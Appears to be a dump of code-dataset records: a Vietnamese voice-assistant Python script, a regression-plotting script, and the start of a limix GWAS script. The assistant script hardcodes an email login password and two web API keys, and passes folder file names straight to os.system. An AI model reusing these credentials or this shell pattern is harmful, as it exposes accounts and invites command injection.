"numpy.linspace", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 90, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.cm", "line_number": 99, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 102, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "astropy.io.fits.Header", "line_number": 106, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 106, "usage_type": "name"}, {"api_name": "astropy.io.fits.getheader", "line_number": 107, "usage_type": "call"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 108, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 108, "usage_type": "name"}, {"api_name": "astropy.io.fits.HDUList", "line_number": 109, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 109, "usage_type": "name"}]} +{"seq_id": "538292914", "text": "import os\nimport playsound\nimport speech_recognition as sr\nimport time\nimport sys\nimport ctypes\nimport wikipedia\nimport datetime\nimport json\nimport re\nimport webbrowser\nimport smtplib\nimport requests\nimport urllib\nimport urllib.request as urllib2\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import strftime\nfrom gtts import gTTS\nfrom youtube_search import YoutubeSearch\nimport pyttsx3\n\nwikipedia.set_lang('vi')\nlanguage = 'vi'\n\n\n# path = ChromeDriverManager().install()\n\n# chuyển văn bản thành âm thanh\ndef speak(text):\n print(\"Trợ Lý ảo: \", text)\n\n engine = pyttsx3.init()\n voices = engine.getProperty('voices')\n rate = engine.getProperty('rate')\n volume = engine.getProperty('volume')\n engine.setProperty('volume', volume - 0.0) # tu 0.0 -> 1.0\n engine.setProperty('rate', rate - 50)\n engine.setProperty('voice', voices[1].id)\n engine.say(text)\n engine.runAndWait()\n\n\n # tts = gTTS(text=text, lang=\"vi\", slow=False)\n # tts.save(\"sound.mp3\")\n # playsound.playsound(\"sound.mp3\", True)\n # os.remove(\"sound.mp3\")\n\n\n# chuyển giọng nói thành văn bản\ndef get_audio():\n ear_robot = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Trợ Lý Ảo: Đang nghe ! -- __ -- !\")\n\n ear_robot.pause_threshold = 4\n audio = ear_robot.listen(source )\n # audio = ear_robot.listen(source, phrase_time_limit=5)\n try:\n text = ear_robot.recognize_google(audio, language=\"vi-VN\")\n print(\"Tôi: \", text)\n return text\n except:\n print(\"Trợ Lý Ảo: Lỗi Rồi ! ... !\")\n return 0\n\n\ndef get_audio_2():\n ear_robot = sr.Recognizer()\n with sr.Microphone() as source:\n ear_robot.pause_threshold = 2\n print(\"Đang nghe ===========================\")\n audio = ear_robot.listen(source)\n try:\n text = ear_robot.recognize_google(audio, language=\"vi-VN\")\n except:\n speak(\"Nhận dạng giọng nói thất bại. Vui lòng nhập lệnh ở dưới\")\n text = input(\"Mời nhập: \")\n return text.lower()\n\n\ndef stop():\n speak(\"Hẹn gặp lại sau nha ! ... \")\n\n\ndef get_text():\n for i in range(3):\n text = get_audio()\n if text:\n return text.lower()\n elif i < 2:\n speak(\"Trợ Lý Ảo không nghe rõ bạn nói. Vui lòng nói lại nha !\")\n time.sleep(3)\n stop()\n return 0\n\n\ndef hello(name):\n day_time = int(strftime('%H'))\n if 0 <= day_time < 11:\n speak(f\"Chào bạn {name}. Chúc bạn buổi sáng tốt lành.\")\n elif 11 <= day_time < 13:\n speak(f\"Chào bạn {name}. Chúc bạn có một buổi trưa thật vui vẻ.\")\n elif 13 <= day_time < 18:\n speak(f\"Chào bạn {name}. Chúc bạn buổi chiều vui vẻ.\")\n elif 18 <= day_time < 22:\n speak(f\"Chào bạn {name}. Tối rồi, Bạn đã cơm nước gì chưa ?\")\n elif 22 <= day_time <= 23:\n speak(f\"Chào Bạn {name}. Muộn rồi bạn nên đi nghủ sớm nha.\")\n else:\n speak(f\"Thời gian bên tôi chưa đúng hoặc gặp lỗi. Bạn nên xem lại nha.\")\n\n\ndef get_time(text):\n now = datetime.datetime.now()\n if 'giờ' in text:\n speak(f\"Bây giờ là {now.hour} giờ {now.minute} phút {now.second} giây\")\n elif \"ngày\" in text:\n speak(f\"hôm nay là ngày {now.day} tháng {now.month} năm {now.year}\")\n else:\n speak(\"Lý Hành chưa hiểu ý bạn.\")\n\n\ndef open_application(text):\n if \"google\" in text:\n speak(\"Mở Google Chrome\")\n os.system(\"C:\\\\Users\\\\ASUS\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\")\n elif \"word\" in text:\n speak(\"Mở Microsoft Word\")\n os.system(\"C:\\\\Users\\\\ASUS\\\\Desktop\\\\Word.lnk\")\n elif \"cốc cốc\" in text:\n speak(\"Mở Cốc Cốc\")\n os.system(\"C:\\\\Users\\\\ASUS\\\\AppData\\\\Local\\\\CocCoc\\\\Browser\\\\Application\\\\browser.exe\")\n else:\n speak(\"Ứng dụng chưa cài đặt. Vui Lòng cài đặt cho tui nha !\")\n\n\ndef open_website(text):\n reg_ex = re.search('mở (.+)', text)\n if reg_ex:\n domain = reg_ex.group(1)\n url = \"https://www.\" + domain\n webbrowser.open(url)\n speak(\"Trang web bạn yêu cầu đã được mở. \")\n if input(\"Nếu muốn tiếp tục thì nhấn q: \") == \"q\":\n pass\n return True\n else:\n return False\n\n\ndef open_google_and_search(text):\n search_for = str(text).split(\"kiếm\", 1)[1]\n url = f\"https://www.google.com/search?q={search_for}\"\n webbrowser.get().open(url)\n speak(\"Đây là thông tin bạn cần tìm\")\n\n\ndef open_google_and_search2():\n speak(\"Nói thứ bạn cần tìm kiếm trên google\")\n search = str(get_text()).lower()\n url = f\"https://www.google.com/search?q={search}\"\n webbrowser.get().open(url)\n speak(\"Đây là thông tin bạn cần tìm\")\n\n\ndef send_email(text):\n speak(\"Bạn gửi email cho ai vậy nhỉ ?\")\n recipient = get_text()\n if \"minh\" in recipient:\n speak(\"Nói cho tôi nội dung email bạn muốn gửi ! ... >\")\n content = get_text()\n mail = smtplib.SMTP(\"smtp.gmail.com\", 587)\n mail.ehlo()\n mail.starttls()\n mail.login(\"itaisv1999@gmail.com\", \"test7777\")\n mail.sendmail(\"itaisv1999@gmail.com\",\n \"huyph11247@gmail.com\", str(content).encode(\"utf-8\"))\n mail.close()\n speak(\"Email của bạn đã được gửi. Bạn vui lòng kiểm tra lại giúp ! >\")\n else:\n speak(\"Lý Hành không hiểu bạn muốn gửi email cho ai ...\")\n\n\ndef current_weather():\n speak(\"Bạn muốn xem thời tiết ở đâu ạ.\")\n # Đường dẫn trang web để lấy dữ liệu về thời tiết\n ow_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n # lưu tên thành phố vào biến city\n city = get_text()\n # nếu biến city != 0 và = False thì để đấy ko xử lí gì cả\n if not city:\n pass\n # api_key lấy trên open weather map\n api_key = \"b4750c6250a078a943b3bf920bb138a0\"\n # tìm kiếm thông tin thời thời tiết của thành phố\n call_url = ow_url + \"appid=\" + api_key + \"&q=\" + city + \"&units=metric\"\n # truy cập đường dẫn của dòng 188 lấy dữ liệu thời tiết\n response = requests.get(call_url)\n # lưu dữ liệu thời tiết dưới dạng json và cho vào biến data\n data = response.json()\n # kiểm tra nếu ko gặp lỗi 404 thì xem xét và lấy dữ liệu\n if data[\"cod\"] != \"404\":\n # lấy value của key main\n city_res = data[\"main\"]\n # nhiệt độ hiện tại\n current_temperature = city_res[\"temp\"]\n # áp suất hiện tại\n current_pressure = city_res[\"pressure\"]\n # độ ẩm hiện tại\n current_humidity = city_res[\"humidity\"]\n # thời gian mặt trời\n suntime = data[\"sys\"]\n # \tlúc mặt trời mọc, mặt trời mọc\n sunrise = datetime.datetime.fromtimestamp(suntime[\"sunrise\"])\n # lúc mặt trời lặn\n sunset = datetime.datetime.fromtimestamp(suntime[\"sunset\"])\n # thông tin thêm\n wthr = data[\"weather\"]\n # mô tả thời tiết\n weather_description = wthr[0][\"description\"]\n # Lấy thời gian hệ thống cho vào biến now\n now = datetime.datetime.now()\n # hiển thị thông tin với người dùng\n content = f\"\"\"\n Hôm nay là ngày {now.day} tháng {now.month} năm {now.year}\n Mặt trời mọc vào {sunrise.hour} giờ {sunrise.minute} phút\n Mặt trời lặn vào {sunset.hour} giờ {sunset.minute} phút\n Nhiệt độ trung bình là {current_temperature} độ C\n Áp suất không khí là {current_pressure} héc tơ Pascal\n Độ ẩm là {current_humidity}%\n \"\"\"\n speak(content)\n else:\n # nếu tên thành phố không đúng thì nó nói dòng dưới 227\n speak(\"Không tìm thấy địa chỉ của bạn\")\n\n\ndef play_youtube():\n speak(\"Nói nội dung bạn muốn tìm trên youtube\")\n search = get_text()\n url = f\"https://www.youtube.com/search?q={search}\"\n webbrowser.get().open(url)\n speak(\"Đây là thứ mà tôi tìm được bạn xem qua nhé\")\n\n\ndef play_youtube_2():\n speak(\"Nói nội dung bạn muốn tìm trên youtube\")\n search = get_text()\n while True:\n result = YoutubeSearch(search, max_results=10).to_dict()\n if result:\n break\n url = f\"https://www.youtube.com\" + result[0]['url_suffix']\n webbrowser.get().open(url)\n speak(\"Đây là thứ mà tôi tìm được bạn xem qua nhé\")\n print(result)\n\n\n# url = 'https://api.unsplash.com/photos/random?client_id=' + \\\n# api_key\ndef change_wallpaper():\n api_key = \"XFyV6boeltUQBb9ROo5nPsWWvoPPDCPLRSwMaO_IXc4\"\n url = 'https://api.unsplash.com/photos/random?client_id=' + \\\n api_key # pic from unspalsh.com\n f = urllib2.urlopen(url)\n json_string = f.read()\n f.close()\n parsed_json = json.loads(json_string)\n photo = parsed_json['urls']['full']\n # Location where we download the image to.\n urllib2.urlretrieve(photo, \"D:\\\\Download____CocCoc\\\\a.png\")\n image = os.path.join(\"D:\\\\Download____CocCoc\\\\a.png\")\n ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)\n speak(\"Hình nền máy tính bạn đã được thay đổi. Bạn ra home xem có đẹp không nha ?\")\n\n\ndef play_music(path):\n # path là tham số chứa đường dẫn thư mục chứa nhạc\n myPATH = path\n # lấy file nhạc ra\n ds = os.listdir(myPATH)\n # dùng for mở từng bài nhạc\n for i in ds:\n print(\"\\nĐang phát bài : \" + i)\n os.system(myPATH + \"\\\\\" + i)\n print(\"\\nĐã phát xong bài : \\t\\t\" + i)\n\n\ndef tell_me_about():\n try:\n speak(\"Hãy nói cho tôi nghe Bạn muốn tìm gì ạ ?\")\n text = get_text()\n contents = wikipedia.summary(text).split('\\n')\n speak(contents[0])\n dem = 0\n for content in contents[1:]:\n if dem < 2:\n speak(\"Bạn có muốn biết thêm không ???\")\n ans = get_text()\n if 'có' not in ans:\n break\n dem += 1\n speak(content)\n speak(\"Đây là nội dung tôi vừa tìm được cảm ơn bạn đã lắng nghe\")\n except:\n speak(f\"{name} không định nghĩa được thuật ngữ của bạn !!!\")\n\n\ndef help_me():\n speak(f\"\"\"\n {robot_name} có thể giúp bạn thực hiện các việc sau đây:\n 1. chào hỏi\n 2. Hiển thị giờ\n 3. Mở website, ứng dụng desktop\n 4. Tìm kiếm với google\n 5. Gửi email\n 6. Dự báo thời tiết\n 7. Tìm kiếm video với youtube\n 8. Thay đổi hình nền máy tính\n 9. Định nghĩa với từ điển bách khoa toàn thư ( Wikipedia )\n 10. Mở nhạc trong máy bạn\n \"\"\")\n\ndef main_brain():\n speak(\"Xin chào. Bạn tên là gì ?\")\n global robot_name\n robot_name = \"Lý hành\"\n global name\n name = get_text()\n if name:\n speak(f'Xin chào bạn {name}.')\n speak(f'Bạn cần LÝ HÀNH giúp gì không ạ ?')\n while True:\n text = get_text()\n\n if not text:\n break\n elif ('tạm biệt' in text) or ('hẹn gặp lại' in text):\n stop()\n break\n elif \"chào trợ lý\" in text:\n hello(name)\n elif \"hiện tại\" in text:\n get_time(text)\n\n elif \"mở\" in text:\n\n if '.' in text:\n open_website(text)\n elif \"mở nhạc\" in text:\n speak(\"Ok. Tôi bắt đầu mở nhạc đây\")\n play_music(r\"D:\\testcode\\youtube\\music_youtube\")\n else:\n open_application(text)\n\n elif \"tìm kiếm\" in text:\n if str(text).split(\"kiếm\", 1)[1] == \"\":\n open_google_and_search2()\n else:\n open_google_and_search(text)\n elif (\"email\" in text) or (\"mail\" in text) or (\"gmail\" in text):\n send_email(text)\n elif \"thời tiết\" in text:\n current_weather()\n elif 'youtube' in text:\n speak(\"Bạn muốn tìm kiếm đơn giản hay phức tạp\")\n yeu_cau = get_text()\n if \"đơn giản\" in yeu_cau:\n play_youtube()\n if input():\n pass\n elif \"phức tạp\" in yeu_cau:\n play_youtube_2()\n if input(\"Tiếp tục y/n: \") == \"y\":\n pass\n elif \"hình nền\" in text:\n change_wallpaper()\n elif \"định nghĩa\" in text:\n tell_me_about()\n elif \"có thể làm gì\" in text:\n help_me()\n else:\n speak(f\"Chức năng chưa có. Bạn vui lòng chọn lại chức năng đã có trong menu nha ! \")\n\nmain_brain()\n", "sub_path": "ai3.py", "file_name": "ai3.py", "file_ext": "py", "file_size_in_byte": 13457, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "wikipedia.set_lang", "line_number": 24, "usage_type": "call"}, {"api_name": "pyttsx3.init", "line_number": 34, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 53, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 54, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 70, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 71, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 128, "usage_type": "call"}, {"api_name": "os.system", "line_number": 131, "usage_type": "call"}, {"api_name": "os.system", "line_number": 134, "usage_type": "call"}, {"api_name": "re.search", "line_number": 140, "usage_type": "call"}, {"api_name": "webbrowser.open", "line_number": 144, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 156, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 164, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 174, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 200, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 216, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 216, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 218, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 218, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 224, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 224, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 244, "usage_type": "call"}, {"api_name": "youtube_search.YoutubeSearch", "line_number": 252, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 256, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 267, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 267, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 270, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 273, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 273, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 274, "usage_type": "call"}, {"api_name": "os.path", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ctypes.windll.user32.SystemParametersInfoW", "line_number": 275, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 275, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 283, "usage_type": "call"}, {"api_name": "os.system", "line_number": 287, "usage_type": "call"}, {"api_name": "wikipedia.summary", "line_number": 295, "usage_type": "call"}]} +{"seq_id": "93170524", "text": "# include flake8, black\n\nimport argparse\nimport os\n\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sympy import latex, Symbol\n\n\ndef regression_2d(x, y, deg, lam):\n \"\"\"\n Find regression assumption for 2D data.\n\n Parameters:\n x : ndarray\n First input.\n y : ndarray\n Second input. Should have the same number of dimensions as x.\n deg : int\n Degree for x in regression function.\n lam : float\n Normalization coefficient.\n\n Returns:\n w : ndarray\n Regression function coefficient.\n # For example\n deg = 3, w = [1,2,3,4]\n -> it means \"f = 1 + 2x + 3x^2 + 4x^3\".\n \"\"\"\n\n phi = np.array([[p ** i for i in range(deg + 1)] for p in x])\n w = np.linalg.inv(phi.T @ phi + lam * np.eye(deg + 1)) @ phi.T @ y\n return w\n\n\ndef regression_3d(x, y, z, deg_x, deg_y, lam):\n \"\"\"\n Find regression assumption for 3D data.\n\n Parameters:\n x : ndarray\n First input.\n y : ndarray\n Second input. Should have the same number of dimensions as x.\n z : ndarray\n Third input. Should have the same number of dimensions as x and y.\n deg_x : int\n Degree for x in regression function.\n deg_y : int\n Degree for y in regression function.\n lam : float\n Normalization coefficient.\n\n Returns:\n w : ndarray\n Regression function coefficient.\n # For example\n deg_x = 3, deg_y = 2, w = [1,2,3,4,5,6]\n -> it means \"f = 1 + 2x + 3x^2 + 4x^3 + 5y + 6y^2\".\n \"\"\"\n\n phi_x = np.array([[p ** i for i in range(deg_x + 1)] for p in x])\n phi_y = np.array([[p ** (i + 1) for i in range(deg_y)] for p in y])\n phi = np.hstack([phi_x, phi_y])\n w = np.linalg.inv(phi.T @ phi + lam * np.eye(deg_x + deg_y + 1)) @ phi.T @ z\n return w\n\n\ndef latexfunc(w, deg_x, deg_y=None):\n \"\"\"\n Convert w (regression function coefficient) into function as LaTeX style.\n\n Parameters:\n w : ndarray\n Regression function coefficient.\n # For example\n deg_x = 3, deg_y = 2, w = [1,2,3,4,5,6]\n -> it means \"f = 1 + 2x + 3x^2 + 4x^3 + 5y + 6y^2\".\n deg_x : int\n Degree for x in regression function.\n deg_y : int\n Degree for y in regression function.\n\n Returns:\n f : str\n Function as LaTeX.\n \"\"\"\n\n x = Symbol(\"x\")\n f = 0\n for i in range(deg_x + 1):\n f += round(w[i], 2) * x ** i\n if deg_y is not None:\n y = Symbol(\"y\")\n for i in range(deg_y):\n f += round(w[deg_x + i + 1], 2) * y ** (i + 1)\n f = latex(f)\n return f\n\n\ndef my_removesuffix(str, suffix):\n \"\"\"\n A method which returns a new string with the trimmed suffix\n if the str ends with it else it will return the original string.\n\n Parameters:\n str : str\n Original string.\n suffix : str\n Trimmed suffix.\n\n Returns:\n str\n New string with the trimmed suffix.\n \"\"\"\n\n return str[: -len(suffix)] if str.endswith(suffix) else str\n\n\ndef main(args):\n \"\"\"\n fname = \"data3.csv\"\n save_fname = \"data3_2.gif\"\n deg_x = 1\n deg_y = 4\n lam = 0.00001\n \"\"\"\n\n fname = args.fname\n save_fname = args.save_fname\n deg_x = args.deg_x\n deg_y = args.deg_y\n lam = args.lam\n\n # get current working directory\n path = os.path.dirname(os.path.abspath(__file__))\n\n # For example, if fname = data1.csv, graphtitle = data1\n graphtitle = my_removesuffix(fname, \".csv\")\n\n fname = os.path.join(path, \"data\", fname)\n save_fname = os.path.join(path, \"result\", save_fname)\n\n # load csv file and convert to ndarray\n data = pd.read_csv(fname).values\n\n # if data is 2 dimensional\n if data.shape[1] == 2:\n x = data[:, 0] # load x1\n y = data[:, 1] # load x2\n\n # define coordinates for regression assumption\n reg_x = np.linspace(x.min(), x.max(), 500)\n reg_y = np.zeros_like(reg_x)\n w = regression_2d(x, y, deg_x, lam)\n # print(w)\n\n y_hat = np.zeros_like(x)\n for i in range(len(w)):\n reg_y += w[i] * reg_x ** i\n y_hat += w[i] * x ** i\n mse = round(np.mean((y - y_hat) ** 2), 3)\n\n # plot original data and regression assumption\n fig = plt.figure()\n ax = fig.add_subplot(111, xlabel=\"X\", ylabel=\"Y\")\n ax.scatter(x, y, s=12, c=\"darkblue\", label=\"observed\")\n plt.plot(reg_x, reg_y, c=\"r\", label=\"predicted\")\n ax.grid(ls=\"--\")\n ax.set_title(\n graphtitle\n + \" (deg = {0}, lam = {1}) MSE = {2:.3f}\\n\".format(deg_x, lam, mse)\n + \"$f(x) = \"\n + latexfunc(w, deg_x)\n + \"$\"\n )\n ax.legend(loc=\"best\", fontsize=10)\n plt.savefig(save_fname)\n plt.show()\n\n # if data is 3 dimensional\n elif data.shape[1] == 3:\n x = data[:, 0] # load x1\n y = data[:, 1] # load x2\n z = data[:, 2] # load x3\n\n # define coordinates for regression assumption\n reg_x = np.linspace(x.min(), x.max(), 30)\n reg_y = np.linspace(y.min(), y.max(), 30)\n reg_x, reg_y = np.meshgrid(reg_x, reg_y)\n reg_z = np.zeros_like(reg_x)\n w = regression_3d(x, y, z, deg_x, deg_y, lam)\n # print(w)\n\n z_hat = np.zeros_like(x)\n for i in range(deg_x + 1):\n reg_z += w[i] * reg_x ** i\n z_hat += w[i] * x ** i\n for i in range(deg_y):\n reg_z += w[deg_x + i + 1] * reg_y ** (i + 1)\n z_hat += w[deg_x + i + 1] * y ** (i + 1)\n mse = round(np.mean((z - z_hat) ** 2), 3)\n\n # plot original data and regression assumption\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n ax.scatter3D(x, y, z, s=20, c=\"darkblue\", label=\"observed\")\n ax.plot_wireframe(\n reg_x, reg_y, reg_z, color=\"red\", linewidth=0.5, label=\"predicted\"\n )\n ax.set(\n title=graphtitle\n + \"_3D (deg_x = {0}, deg_y = {1}, lam = {2}) MSE = {3:.3f}\\n\".format(\n deg_x, deg_y, lam, mse\n )\n + \"$f(x, y) = \"\n + latexfunc(w, deg_x, deg_y)\n + \"$\",\n xlabel=\"X\",\n ylabel=\"Y\",\n zlabel=\"Z\",\n )\n ax.legend(loc=\"best\", fontsize=10)\n plt.savefig(save_fname.replace(\"gif\", \"png\"))\n\n # unused\n \"\"\"\n def init():\n ax.scatter3D(x, y, z, s=20, c=\"darkblue\")\n ax.set(title=\"3D\", xlabel=\"X\", ylabel=\"Y\", zlabel=\"Z\")\n return fig\n \"\"\"\n\n def update(i):\n \"\"\"\n Move view point.\n\n Parameters:\n i : int\n Number of frames.\n\n Returns:\n fig : matplotlib.figure.Figure\n Figure viewed from angle designated by view_init function.\n \"\"\"\n\n ax.view_init(elev=30.0, azim=3.6 * i)\n return fig\n\n # animate graph\n ani = animation.FuncAnimation(fig, update, frames=100, interval=100)\n ani.save(save_fname, writer=\"pillow\")\n # ani.save(path + \"/result/data3_result3D.mp4\", writer=\"ffmpeg\", dpi=100)\n plt.show()\n\n\nif __name__ == \"__main__\":\n # process args\n parser = argparse.ArgumentParser(description=\"Regression and Regularization.\")\n parser.add_argument(\"fname\", type=str, help=\"Load Filename\")\n parser.add_argument(\"save_fname\", type=str, help=\"Save Filename\")\n parser.add_argument(\n \"-x\",\n \"--deg_x\",\n type=int,\n help=\"Degree for x in regression function\",\n required=True,\n )\n parser.add_argument(\n \"-y\",\n \"--deg_y\",\n type=int,\n help=\"Degree for y in regression function (optional, Default = 0).\\nif you load data3.csv, this is required.\",\n default=0,\n )\n parser.add_argument(\n \"-l\",\n \"--lam\",\n type=float,\n help=\"Normalization coefficient (optional, Default = 0).\",\n default=0,\n )\n args = parser.parse_args()\n main(args)\n", "sub_path": "ex_3/t_yamamoto/ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 8306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 69, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 93, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 98, "usage_type": "call"}, {"api_name": "sympy.latex", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 263, "usage_type": "call"}]} +{"seq_id": "327598811", "text": "\"\"\"\n mtl (multi trait limix)\n author: christian goeschl\n date: 2016-09-16\n\"\"\"\n\nimport csv\nimport sys\nimport time\n\nimport h5py\nimport limix.qtl as qtl\nimport numpy as np\nimport os\nimport pandas as pd\nimport scipy as sp\n\nimport pygwas_modules.kinship as kinship\nimport pygwas_modules.plotting as gplt\nimport pygwas_modules.result as res\nfrom genehunter.core.GeneAnnotationDbExtractor import GeneAnnotationDbExtractor\n\n\nclass MTL:\n def __init__(self, mac_thres=0):\n self.mac_thres = mac_thres\n self.phenotypes = pd.DataFrame()\n # self.snps = None\n # self.iid = None\n self.ibs = None\n self.ts_norm = None\n # self.bnorm_K = None\n # self.used_snp_pos = None\n self.macs = None\n self.mafs = None\n # self.chromosomes = None\n # self.chr_names = None\n self.pvalues = None\n\n def read_phenotype_col(self, phenotype_filepath, colnr, colprefix=\"\"):\n sys.stdout.write(\"reading phenotypes: {}, col: {}\\n\".format(phenotype_filepath, colnr))\n with open(phenotype_filepath, 'U') as phenofile:\n dialect = csv.Sniffer().sniff(phenofile.readline())\n phenofile.seek(0)\n\n reader = csv.reader(phenofile, dialect=dialect)\n hcols = reader.next()\n\n p = []\n for dcols in reader:\n if len(dcols) == 0:\n continue\n\n try:\n p.append([dcols[0], np.float64(dcols[colnr])])\n except ValueError:\n sys.stdout.write(\n \"excluding accession {} because of trait value {}\\n\".format(dcols[0], dcols[colnr]))\n continue\n\n data = pd.DataFrame(p)\n\n ids = data[0].values\n data.index = ids\n data = data[list(range(1, data.shape[1]))]\n data.columns = [\"_\".join([colprefix, hcols[colnr]])]\n\n if self.phenotypes.size == 0:\n self.phenotypes = data\n else:\n pheno_acc_ids = list(set(self.phenotypes.index) & set(ids))\n self.phenotypes = pd.concat([self.phenotypes.loc[pheno_acc_ids], data.loc[pheno_acc_ids]], axis=1)\n sys.stdout.write(\"phenotype intersection is {} accessions.\\n\".format(len(pheno_acc_ids)))\n\n self.phenotypes.sort_index(axis=0, inplace=True)\n return\n\n def write_phenotypes(self, path):\n self.phenotypes.to_csv(path, sep=',', index=True, index_label=\"Acc_ID\")\n\n def read_genotypes(self, genotype_filepath):\n sys.stdout.write(\"reading genotypes ... \")\n sys.stdout.flush()\n with h5py.File(genotype_filepath, 'r') as genofile:\n 